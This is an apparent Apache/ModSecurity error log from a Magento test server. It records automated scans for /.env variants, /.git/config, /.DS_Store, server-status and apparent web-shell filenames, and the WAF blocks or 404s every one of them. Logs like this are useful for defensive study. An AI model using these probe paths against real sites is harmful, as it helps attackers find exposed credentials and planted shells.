[Sat Sep 06 19:08:32.546657 2025] [:error] [pid 2516673] [client 195.178.110.161:46098] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aLxqkMYn8eNvFaPWcnHLdAAAAAA"]
[Sat Sep 06 19:08:32.800315 2025] [:error] [pid 2516699] [client 195.178.110.161:46112] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aLxqkMWE06U_wvqXl4safgAAAAU"]
[Sat Sep 06 19:08:32.800552 2025] [:error] [pid 2516699] [client 195.178.110.161:46112] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aLxqkMWE06U_wvqXl4safgAAAAU"]
[Sat Sep 06 19:08:32.800723 2025] [:error] [pid 2516699] [client 195.178.110.161:46112] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aLxqkMWE06U_wvqXl4safgAAAAU"]
[Sat Sep 06 19:08:33.031778 2025] [:error] [pid 2521930] [client 195.178.110.161:46122] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aLxqkWwHorgih5RQI8dUhAAAAAc"]
[Sat Sep 06 19:08:33.032034 2025] [:error] [pid 2521930] [client 195.178.110.161:46122] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aLxqkWwHorgih5RQI8dUhAAAAAc"]
[Sat Sep 06 19:08:33.032216 2025] [:error] [pid 2521930] [client 195.178.110.161:46122] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aLxqkWwHorgih5RQI8dUhAAAAAc"]
[Sat Sep 06 19:08:33.285268 2025] [:error] [pid 2525773] [client 195.178.110.161:46126] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aLxqkc17Afe8hFPbueQjwgAAAAg"]
[Sat Sep 06 19:08:33.285513 2025] [:error] [pid 2525773] [client 195.178.110.161:46126] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aLxqkc17Afe8hFPbueQjwgAAAAg"]
[Sat Sep 06 19:08:33.285671 2025] [:error] [pid 2525773] [client 195.178.110.161:46126] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aLxqkc17Afe8hFPbueQjwgAAAAg"]
[Sat Sep 06 19:08:43.521943 2025] [authz_core:error] [pid 2516675] [client 195.178.110.161:44230] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Sat Sep 06 19:08:43.732655 2025] [:error] [pid 2525774] [client 195.178.110.161:44238] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aLxqm5dkF99v8jGNnYL9eAAAAAk"]
[Sat Sep 06 19:08:43.732890 2025] [:error] [pid 2525774] [client 195.178.110.161:44238] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aLxqm5dkF99v8jGNnYL9eAAAAAk"]
[Sat Sep 06 19:08:43.733049 2025] [:error] [pid 2525774] [client 195.178.110.161:44238] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aLxqm5dkF99v8jGNnYL9eAAAAAk"]
[Sat Sep 06 19:08:50.159442 2025] [:error] [pid 2516673] [client 195.178.110.161:52144] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aLxqosYn8eNvFaPWcnHLdQAAAAA"]
[Sat Sep 06 19:08:50.159694 2025] [:error] [pid 2516673] [client 195.178.110.161:52144] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aLxqosYn8eNvFaPWcnHLdQAAAAA"]
[Sat Sep 06 19:08:50.159851 2025] [:error] [pid 2516673] [client 195.178.110.161:52144] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aLxqosYn8eNvFaPWcnHLdQAAAAA"]
[Sat Sep 06 19:08:55.245280 2025] [:error] [pid 2516699] [client 195.178.110.161:52148] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aLxqp8WE06U_wvqXl4safwAAAAU"]
[Sat Sep 06 19:08:55.246238 2025] [:error] [pid 2516699] [client 195.178.110.161:52148] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aLxqp8WE06U_wvqXl4safwAAAAU"]
[Sat Sep 06 19:08:55.246461 2025] [:error] [pid 2516699] [client 195.178.110.161:52148] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aLxqp8WE06U_wvqXl4safwAAAAU"]
[Sat Sep 06 19:08:55.475900 2025] [:error] [pid 2521930] [client 195.178.110.161:52156] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aLxqp2wHorgih5RQI8dUhQAAAAc"]
[Sat Sep 06 19:08:55.476148 2025] [:error] [pid 2521930] [client 195.178.110.161:52156] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aLxqp2wHorgih5RQI8dUhQAAAAc"]
[Sat Sep 06 19:08:55.476317 2025] [:error] [pid 2521930] [client 195.178.110.161:52156] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aLxqp2wHorgih5RQI8dUhQAAAAc"]
[Sun Sep 14 21:30:51.694101 2025] [:error] [pid 2717494] [client 216.81.248.61:51516] [client 216.81.248.61] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMcX6wwXyXwptWmApwc34AAAAAY"]
[Sun Sep 14 21:30:51.696847 2025] [:error] [pid 2717494] [client 216.81.248.61:51516] [client 216.81.248.61] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMcX6wwXyXwptWmApwc34AAAAAY"]
[Sun Sep 14 21:30:51.697027 2025] [:error] [pid 2717494] [client 216.81.248.61:51516] [client 216.81.248.61] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMcX6wwXyXwptWmApwc34AAAAAY"]
[Sun Oct 12 12:02:43.284180 2025] [php:error] [pid 3416917] [client 172.190.142.176:41007] script '/var/www/magento.test.indacotrentino.com/www/pub/images/Marvins.php' not found or unable to stat
[Sun Oct 12 12:03:29.602727 2025] [php:error] [pid 3416917] [client 172.190.142.176:41007] script '/var/www/magento.test.indacotrentino.com/www/pub/images/about.php' not found or unable to stat
[Wed Oct 22 14:33:37.153303 2025] [authz_core:error] [pid 3668489] [client 68.183.9.16:47126] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Oct 22 14:33:38.664661 2025] [:error] [pid 3678602] [client 68.183.9.16:47166] [client 68.183.9.16] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPjPItT1_CQ1KJaounX1ywAAAAs"]
[Wed Oct 22 14:33:38.664895 2025] [:error] [pid 3678602] [client 68.183.9.16:47166] [client 68.183.9.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPjPItT1_CQ1KJaounX1ywAAAAs"]
[Wed Oct 22 14:33:38.665072 2025] [:error] [pid 3678602] [client 68.183.9.16:47166] [client 68.183.9.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPjPItT1_CQ1KJaounX1ywAAAAs"]
[Wed Oct 22 14:33:39.199580 2025] [:error] [pid 3668727] [client 68.183.9.16:47178] [client 68.183.9.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPjPI5R-K0qX3z9KpY_2YQAAAAg"]
[Wed Oct 22 14:33:39.199800 2025] [:error] [pid 3668727] [client 68.183.9.16:47178] [client 68.183.9.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPjPI5R-K0qX3z9KpY_2YQAAAAg"]
[Wed Oct 22 14:33:39.200000 2025] [:error] [pid 3668727] [client 68.183.9.16:47178] [client 68.183.9.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPjPI5R-K0qX3z9KpY_2YQAAAAg"]
[Wed Oct 22 14:33:39.546078 2025] [:error] [pid 3679799] [client 68.183.9.16:47190] [client 68.183.9.16] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPjPI67dJvOZ08Nmt_LU_QAAAAQ"]
[Wed Oct 22 14:33:39.546294 2025] [:error] [pid 3679799] [client 68.183.9.16:47190] [client 68.183.9.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPjPI67dJvOZ08Nmt_LU_QAAAAQ"]
[Wed Oct 22 14:33:39.546479 2025] [:error] [pid 3679799] [client 68.183.9.16:47190] [client 68.183.9.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPjPI67dJvOZ08Nmt_LU_QAAAAQ"]
[Fri Oct 24 11:49:01.008005 2025] [authz_core:error] [pid 3722555] [client 143.110.213.72:34652] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Oct 24 11:49:02.178325 2025] [:error] [pid 3722556] [client 143.110.213.72:34684] [client 143.110.213.72] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPtLjo4wJNhUhIt3vUHcrAAAAB0"]
[Fri Oct 24 11:49:02.178617 2025] [:error] [pid 3722556] [client 143.110.213.72:34684] [client 143.110.213.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPtLjo4wJNhUhIt3vUHcrAAAAB0"]
[Fri Oct 24 11:49:02.178813 2025] [:error] [pid 3722556] [client 143.110.213.72:34684] [client 143.110.213.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPtLjo4wJNhUhIt3vUHcrAAAAB0"]
[Fri Oct 24 11:49:02.525211 2025] [:error] [pid 3722571] [client 143.110.213.72:34686] [client 143.110.213.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPtLjlrRcczNxK1BTu5xHwAAACw"]
[Fri Oct 24 11:49:02.525414 2025] [:error] [pid 3722571] [client 143.110.213.72:34686] [client 143.110.213.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPtLjlrRcczNxK1BTu5xHwAAACw"]
